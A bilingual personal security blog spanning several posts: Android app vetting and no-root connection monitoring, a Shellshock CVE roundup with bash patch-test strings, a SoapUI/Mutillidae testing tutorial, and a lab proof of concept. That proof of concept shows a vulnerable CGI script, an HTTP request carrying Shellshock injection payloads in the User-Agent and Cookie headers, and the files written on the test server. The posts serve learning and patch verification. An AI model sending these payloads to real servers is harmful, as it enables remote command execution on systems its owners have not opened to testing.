27 Jan 2015

Mes sélections d'applications Android | My Android App Selections

Voici les critères de sélection d'applications Android que j'utilise:

  1. Je recherche mes applications soit en utilisant Google Play et en examinant les privilèges détaillés (Permissions: View Details), soit je recherche par permissions (critère: permission "INTERNET / Full network access" exclus) via le site IzzyOnDroid.
  2. L'application ne doit pas demander plus de privilèges que nécessaire
  3. Lorsque possible, l'application ne doit pas combiner la lecture de données personnelles (incluant fichiers, comptes Google, numéro de téléphone...) et l'accès réseau (full network access) à moins que l'auteur de l'application soit une source autoritaire (Google, Firefox...)
  4. Lorsque l'application a un besoin légitime de connecter vers l'Internet, elle ne doit pas avoir démontré des signes de fuites de données personnelles (ex.: connection vers des addresses inconnues), de surveillance (ex.: flurry.com) ou annonces publicitaires (ex.: admob.com). J'utilise NoRoot Firewall sur un appareil de test pendant un certain temps, je relève la liste de connections (addresses IP ou domaines) et j'arrive à ma propre conclusion. Pour investiguer des addresses IP, j'utilise robtex.com.
  5. L'application doit bien fonctionner, selon mes besoins (rapide, efficace, lisible, adaptable). Je préfère payer pour avoir ce que j'ai besoin. Malheureusement, il n'existe pas beaucoup d'applications autres que celles de Google qui rencontrent mes critères.
Cliquer ici pour voir mon analyse récente. Voir plus bas pour ma liste actuelle d'applications candidates.

Here's my criteria for selecting Android apps from the Google Play Store:
  • I initially search for apps in the Google Play Store and view the detailed permissions (Permissions: View Details) or I search by permissions (criteria: Permission "INTERNET / Full Network Access" excluded) using the IzzyOnDroid site. 
  • I check that the app does not require more privileges than necessary.
  • When possible, the app should not combine the reading of personal data (files, Google accounts, telephone number...) and Internet access (full network access) unless it comes from an authoritative source (that I somewhat trust) such as Google, Firefox, etc.
  • When the app has a legitimate need to connect to the Internet, it should not have exhibited signs of personal (or business) data leakage by connecting to unknown sites/domains, by connecting to monitoring sites (e.g. flurry.com) or advertising sites (e.g. admob.com). I utilize NoRoot Firewall on a test device for a certain time, I pull-up the list of connections and then I make my own conclusion. For target hosts that I only have the IP address for, I use robtex.com to investigate it further.
  • The application must function real well, as per my needs (fast, efficient, readable, adaptable). I much prefer to pay for an app that works as I want. Unfortunately, there aren't that many that fall outside of the Google realm and that meet the above criteria.
Click here to see a recent analysis. Below is my resulting short list.

Mes Sélections Actuelles / My Apps Shortlist



App NameAuthorPurpose
Android Device ManagerGoogleRemote wipe if device lost/stolen. Find Device
AuthenticatorGoogle2 factor auth.
CalendarGoogleCalendaring
CameraGoogleCamera
Data ON-OFFAntonio La RoccaMobile data toggle
DocsGoogleDoc Viewer
DriveGoogleCloud Storage
EarthGoogleMapping
English for Smart Keyboard PRODexilog, LLCKeyboard
FirefoxMozillaWeb Browsing
FitGoogleFitness Tracking
French for Smart Keyboard PRODexilog, LLCKeyboard
GmailGoogleEmailing
Google Play BooksGoogleEPub Reader. Google Play books reader.
Google Play MusicGoogleMusic player
Google Play NewsstandGoogleNews reading
Google Play servicesGoogleAndroid Apps Support
Google Play StoreGoogleAndroid Apps Downloads
Google Text-to-speech EngineGoogleText to speech
HangoutsGoogleInstant Messaging
Hangouts DialerGoogleInternet calling
IllicoVideotronDVR control and TV Schedule
illico.tvVideotronDVR control and TV Schedule
illico.tv PluginVideotronDVR control and TV Schedule
JogTrackerHighway North InteractiveFitness Tracking
JogTracker ProHighway North InteractiveFitness Tracking
KeepGoogleNotes taking
MapsGoogleMaps & GPS
My AccountTelusTelus mobile account mgmt
News & WeatherGoogleNews reading
NoRoot FirewallGrey ShirtsFirewall
OI File ManagerOpenintentsDirectory Browser
Orion ViewerMichael BogdanovPDF reader
Screen FilterQuatitative LabsReduce display brightness
SheetsGoogleSpreadsheets
Simple MP3 Folder PlayerJürgs AppMusic player with dark widget (reviewing)
SlidesGoogleSlide viewer
Smart Keyboard ProDexilog, LLCKeyboard
Solati ReaderSolati LabsEPub Reader (NB: no TOC)
TranslateGoogleLanguage
VLCVideolabsVideo and music player
YouTubeGoogleVideo and music player

3 Jan 2015

Analyse de fuites sous Android | Data leakage analysis for Android

Voici quelques idées d'approches pour analyser les connections réseau que nos applications Android essaient d'initier, sans avoir besoin de "rooter" l'appareil. Outils mentionnés: Android Connection Monitor (historique de connexions), NoRoot Firewall, (historique de connexions et contrôle du traffic sortant) tcpdump, tshark (historique des réponses DNS) et Robtex (analyse de réputation et des rôles des systèmes hôtes).

On peut considérer la méthode décrite ici-bas comme une première partie, pour identifier quelle application spécifique se connecte à quel serveur. En deuxième lieu, on devra analyser le traffic détaillé via des techniques conventionnelles telles qu'avec Wireshark, un proxy d'interception SSL comme mitmproxy, etc. Ce qui n'est pas couvert ici (encore) mais cet article donne une très bonne idée..
Below, I propose a few ideas to analyze network connections initiated by Android Apps, without the need to root the device. Tools mentioned: Android Connection Monitor (connection logs) NoRoot Firewall (connection logs, egress traffic control) tcpdump, tshark (DNS response logs) and Robtex (host reputation/purpose analysis).
We should consider the method described below as a first step, to identify which specific app connects to which server. Secondly, we would need to analyze the traffic details by using tools such as Wireshark, an interception proxy such as  mitmproxy, etc. This it not covered here (yet) but this post gives very good ideas.

Connection Monitor

Démarrer Connection Monitor  |  Start Connection Monitor

Installer Connection Manager sur l'appareil Android à partir de Google Play et démarrer l'application et sélectionner l'onglet Connections Log:
Install Connection Manager on Android device from Google Play and start the app and select the Connections Log tab:


Exporter l'historique des connections  |  Export Connection Logs

Laisser l'application s'exécuter pendant un certain temps et exporter les données en sélectionnant l'onglet Settings et en choisissant la fonction Export Database and Send:
Let the app run for a while and then export its data by selecting the Settings tab and by pressing Export Database and Send:


NoRoot Firewall

Démarrer NoRoot Firewall  |  Start NoRoot Firewall

Installer NoRoot Firewall (de Greyshirts) à partir de Google Play.
Install NoRoot Firewall from Google Play.

Démarrer l'application NoRoot Firewall et presser sur Start et configurer pour exécution automatique lors de démarrage en activant Auto start on boot:
Start NoRoot Firewall and press Start and configure to Auto start on Boot:

Configurer NoRoot Firewall  |  Configure NoRoot Firewall

Configurer les accès pour chaque application dans NoRoot Firewall via l'onglet "Pending Access" et en sélectionnant une application (ne pas presser sur Allow ou Deny):

Configure access for each app in NoRoot Firewall by configuring each app under the Pending Access tab and by selecting each app (but don't press on Allow or Deny):



Accepter ou rejeter chaque accès granulaire selon votre bon sens (accès minimum nécessaires) ou en faisant une recherche sur un site tel que Robtex ou SANS ISC.
Accept or reject each granular network access based on your common sense (minimum access) and/or by researching via sites such as Robtex or SANS ISC.



Après quelques répétitions, configurer des règles généralisées (mais conserver quelques répétitions):
After a few repetitions for the same domains/subnets, configure a generalized rule (but keep the repetitions for future analysis):



Répéter pour toutes les applications installées, de façon itérative, sous utilisation normale de tous les jours. Éventuellement, la plupart des applications seront configurée telles que voulues, permettant le traffic qu'on veut bien laisser passer, vers les domaines appropriés.

Repeat for all installed apps iteratively, as a result of normal daily usage. Eventually, most of your apps will have been configured as needed, allowing traffic to pass or not, based on domain names and your own research.


Les paragraphes qui suivent permettent d'extraire la configuration the NoRoot Firewall et de la visualiser à partir d'un PC (ou même de la transférer vers un autre appareil).
The following paragraphs will allow you to extract the NoRoot Firewall configuration in order to view it on a PC (or even transfer it to another Android device).

Faire une copie de sauvegarde vers PC  |  Backup data to PC

Activer le mode USB debugging sur l'appareil Android:

Turn on USB debugging on Android device:

Connecter d'un PC vers l'appareil en utilisant adb et un cable USB (exemple avec Mac). Faire une copie de sauvegarde des données de NoRoot Firewall. Sur l'appareil, presser OK:
Connect a PC to an Android via USB and use adb. Make a backup of the NoRoot Firewall data:
(macos)$ adb backup -f norootfw.ab app.greyshirts.firewall
Now unlock your device and confirm the backup operation.
 


Extraire les règles de NoRoot Firewall  |  Extract rules from NoRoot Firewall
Télécharger Android Backup Extractor. Ensuite, extraire les fichiers du fichier de sauvegarde.
Download  Android Backup Extractor. Then, extract the files from the backup.
(macos)$ java -jar abe.jar unpack norootfw.ab norootfw.tar
Strong AES encryption not allowed
Magic: ANDROID BACKUP
Version: 3
Compressed: 1
Algorithm: none

203264 bytes written to norootfw.tar.
(macos)$ tar xvf norootfw.tar
x apps/app.greyshirts.firewall/_manifest
x apps/app.greyshirts.firewall/f/persistentlog.txt
x apps/app.greyshirts.firewall/db/db-journal
x apps/app.greyshirts.firewall/db/db
x apps/app.greyshirts.firewall/sp/PREF.xml
Extraire les données de la BD de NoRoot Firewall avec sqlite3:
Extracting data from the NoRoot Firewall database with sqlite3:
$ cd apps/app.greyshirts.firewall/db
$ sqlite3 db
SQLite version 3.7.13 2012-07-17 17:46:21
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE android_metadata (locale TEXT);
CREATE TABLE app (appName TEXT, pkg1Name TEXT, appType INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0, type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0, _id INTEGER PRIMARY KEY AUTOINCREMENT );
CREATE TABLE pending (serverIp TEXT, serverHost TEXT, serverPort INTEGER, localIp TEXT, localPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, appName TEXT, allAppName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, appUid INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
CREATE INDEX filter_pkg1 ON filter(pkgName);
CREATE INDEX filter_pkg2 ON filter(pkg2Name);
CREATE INDEX filter_pkg3 ON filter(pkg3Name);
CREATE INDEX pend_pkg1 ON pending(pkgName);
CREATE INDEX pend_pkg2 ON pending(pkg2Name);
CREATE INDEX pend_pkg3 ON pending(pkg3Name);


sqlite> select appName,serverIp,serverPort from filter order by appName;
Aldiko Premium|*|-1
Aldiko Premium|static.86.130.76.144.clients.your-server.de|80
Aldiko Premium|hit-block.opendns.com|443
Android System|192.168.22.1|7
Android System|*.cloudfront.net|80
Android System|cache.google.com|80
Android System|*|-1
Calendar|*.1e100.net|443
Calendar|64.233.*.*|443
Calendar|64.233.171.95|443
Calendar|qg-in-f95.1e100.net|443
[...]


sqlite> .output filter.txt
sqlite> select appName,serverIp,serverPort from filter order by appName;


sqlite> .output dump.sql
sqlite> .dump

Historique de résolution DNS  |  DNS Resolution History

Liste complète des correspondances DNS  |  Full list of DNS mappings

Si on veut obtenir une liste complète des réponses DNS obtenues sur le réseau, on peut utiliser tcpdump et tshark comme suit:
If we need to obtain a full list of DNS name to IP address mappings, we can run tcpdump and let it collect this information and then get the mappings via tshark:
(Linux OS) # tcpdump -n -i eth1 -w dns1.pcap port 53 &
(attendre quelques heures  |  wait a few hours)
(Linux OS) # tshark -nr dns1.pcap -Y "(dns.flags.response == 1) && (dns.qry.type == 1)" -T fields -e dns.qry.name -e dns.resp.addr | head

Running as user "root" and group "root". This could be dangerous.
nrdp.nccp.netflix.com    107.21.213.110
myip.opendns.com    166.62.205.221
googlemail.l.google.com    74.125.226.21,74.125.226.22
nrdp.nccp.netflix.com    50.17.199.72
www.jourzero.com    173.194.68.121
nrdp.nccp.netflix.com    184.73.164.236
www.jourzero.com    64.233.171.121
myip.opendns.com    166.62.205.221
nrdp.nccp.netflix.com    184.73.248.203
cdn0.nflximg.net    24.200.246.83,24.200.246.57

Analyse de réputation  |  Reputation Analysis 

Robtex.com

Le site robtex.com est est outil très utile qui fait l'aggrégation de données d'analyse provenant de différentes sources (whois, blacklists, DNS, multi-hosting...). Simplement en allant à la page principale, on peut initier une recherge qui nous amènera aux détails appropriés.

On peut aussi utiliser des liens direct tels que : http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).
For my needs, robtex.com has been a very useful tool for aggregating analysis data from various sources (whois, blacklists, DNS, multi-hosting...). Simply going to the main page and initiating a search from the top input form will get you what you need. 
You can also use direct URIs such as : http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).

There's also a nice little trick described below for getting colored links and details via hovering...

Intégration vers Robtex  |  Integration to Robtex

Lorsqu'on affiche nos résultats d'analyse, on peut intégrer ces résultats avec des données du service Robtex, tel que décrit ici. Ce qui permet d'avoir des liens actifs avec couleur, en fonction de la réputation. La section suivante montre un exemple.
When printing our results to screen, we can use robtex as described here. This would allow active links to be shown with colors and hovering capabilities. The next section shows an example of this.

Consolider les données  |  Putting it all together

Bien sûr, il est possible de simplifier et d'automatiser une bonne partie des étapes décrites ci-haut. Pour l'instant, j'ai les résultats suivants obtenus via un peu de scriptage pour identifier des connections à investiguer possiblement...
Surely, it's possible to simplify and automate some of the above. But for now, I've only performed a bit of scripting to output sample results for some connections to maybe look into...

App NameHost NameIP AddressPort
Aldiko Premiumwww.aldiko.co184.168.221.1980

(probably data.flurry.com)216.52.203.13443

(probably data.flurry.com)74.217.75.110443

static.86.130.76.144.clients.your-server.de144.76.130.8680
Google Play Newsstandbs.serving-sys.com
80
iSyncrec2-174-129-19-57.compute-1.amazonaws.com
443


NB: if the above IP addresses aren't colored or hovering doesn't work, it may be that the javascript from robtex.com is blocked locally (via something like noscript) or your client is being blacklisted temporarily by the service (i.e. if you're reloading this page too often). If this happens, try later.


29 Sep 2014

Current Intel on BashBug / Shellshock

CVEs
CVE-2014-6271  (1st bug report)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-7169   (2nd bug/variant, aka AfterShock)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant found by Redhat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant found by Redhat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant found by Google's Michael Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-627
Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant found by Google's Michael Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
Variant 2. (see Variant 1 CVE-2014-6277 for a description)

From SANS Advisory Board: Only the first two listed above are patched in “main stream” linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

Other Info
GNU Patch Info
List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

Botnets

Network Detection (IDS, IPS, WAF)
  • VRT and EmergingThreats posts showing this is being addressed for Snort
  • ...
Exploits

Bash Test Strings
Command line tests to verify proper patching (and to somehow use in our detections):
  • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
  • Later patch: foo='() { echo Not patched; }' bash -c foo
  • (search for more...)

25 Sep 2014

POC for ShellShock / BashBug CVE-2014-6271

Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result though via a GET parameter though (either via URL-encoding or by just encoding spaces) but I just wanted to prove the point for myself quickly...


Simple CGI Script on a vulnerable server

/usr/lib/cgi-bin$ cat echo.sh
#!/bin/bash
echo -e "Content-type: text/plain\n\n"
echo "hi ya! Is there a file in /tmp as a result of this?";
echo "Output from env:"
env



GET request from attacker

GET /cgi-bin/echo.sh HTTP/1.1
Host: localhost
Content-Length: 0
User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
Connection: keep-alive




GET response received by attacker

HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 23:42:53 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 1866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

hi ya! Is there a file in /tmp as a result of this?
Output from env:
[...]
HTTP_USER_AGENT=() { :
}
HTTP_COOKIE=() { :
}
_=/usr/bin/env



Result on attacked server

$ ls /tmp/Hacked*
/tmp/HackedViaCookie /tmp/HackedViaUserAgent

1 May 2014

Getting started in web services testing with SoapUI and Mutillidae


J'ai écrit cet article pour aider quiconque qui désire commencer à utiliser SoapUI pour vérifier la sécurité de services web (SOAP). Pour ce faire, on commence par mettre en place Mutillidae qui contient quelques services à tester. Par la suite, on exécute un test d'injection SQL.

Excusez l'anglais. Je n'ai pas vraiment le temps de le traduire.  Mais une image vaut mille mots, n'est-ce pas?
______________


 This post is meant to help a security tester with setting up SoapUI and use it against the test web services included in Mutillidae.

Setting up a local test environment with web services

Setting up SoapUI

  • Setup SoapUI and create a test project for Mutillidae and load the various Mutillidae WSDL files and setup the associated test suites for each WSDL:
  •  As a simple test, double click getUserInformation and add username and password values as follows: 


  •   Click on the green Submit Request button and wait for the response in the right pane:
 


  Creating a security test

  •   Create a new Security Test:













  • Optionally, add another specific assertion, as demonstrated below.

Note that adding an XPath assertion for many injection issue testing may not be a good idea. At least, you have to ensure that the assertion will cover all the cases. For example, below, we add an XPath expression to cover the case of a normal request (node count = 1) and the case of an empty result set (node count = 0).







  Running the test


  Inspecting the results